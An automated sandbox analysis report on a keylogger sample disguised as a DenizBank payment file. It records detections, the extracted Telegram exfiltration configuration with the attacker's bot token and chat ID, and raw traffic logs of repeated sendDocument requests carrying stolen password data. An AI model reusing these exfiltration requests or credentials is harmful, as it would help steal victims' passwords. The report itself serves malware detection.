Windows Analysis Report
denizbank 25.11.2024 E80 aspc.exe

AV Detection

Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0", "Chat_id": "-4551023826", "Version": "4.4"}
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0", "Chat id": "-4551023826", "Version": "4.4"}
Source: denizbank 25.11.2024 E80 aspc.exe.7656.5.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendMessage"}

Source: denizbank 25.11.2024 E80 aspc.exe

ReversingLabs: Detection: 36%

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: denizbank 25.11.2024 E80 aspc.exe

Joe Sandbox ML: detected

Location Tracking

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49735 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50127 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50129 version: TLS 1.2

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: yGuK.pdb source: denizbank 25.11.2024 E80 aspc.exe
Source:	Binary string: yGuK.pdbSHA256 source: denizbank 25.11.2024 E80 aspc.exe

Software Vulnerabilities

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 0723DA5Ah		0_2_0723E087
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 011AF45Dh		5_2_011AF2C0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 011AF45Dh		5_2_011AF52F
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 011AF45Dh		5_2_011AF4AC
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 011AFC19h		5_2_011AF961
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A10D0Dh		5_2_06A10B30
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A11697h		5_2_06A10B30
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A131E0h		5_2_06A12DC8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A12C19h		5_2_06A12968
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1E959h		5_2_06A1E6B0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1E0A9h		5_2_06A1DE00
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1E501h		5_2_06A1E258
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1F661h		5_2_06A1F3B8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1EDB1h		5_2_06A1EB08
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1F209h		5_2_06A1EF60
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1CF49h		5_2_06A1CCA0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1D3A1h		5_2_06A1D0F8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1FAB9h		5_2_06A1F810
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		5_2_06A10040
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1DC51h		5_2_06A1D9A8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A131E0h		5_2_06A12DC2
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A131E0h		5_2_06A1310E
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 4x nop then jmp 06A1D7F9h		5_2_06A1D550

Networking

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/11/2024%20/%2007:56:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0e6439c8d8e7Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f9508ae93d4Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fc68a93853dHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ff6921c8f43Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1022a107cabdHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd104fc51b5f72Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd108a77d22bf7Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10bd7861d1e0Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10fdebe870d2Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd114312a04c68Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd119cdcf32feeHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11f54a4d3e32Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd123ed2feb5eaHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12d0c3219a48Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd135bb878f417Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd140d7a5ee1a3Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd14ac26879be1Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd182de5622be0Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd193474f36c09Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1b822ea7b891Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1c192e1ef1f1Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1e7018cadc20Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21292cee4675Host: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd86961858f128Host: api.telegram.orgContent-Length: 580
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8ddcce5e6fa50baHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8ff950ef5a466fbHost: api.telegram.orgContent-Length: 580Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49757 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49735 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

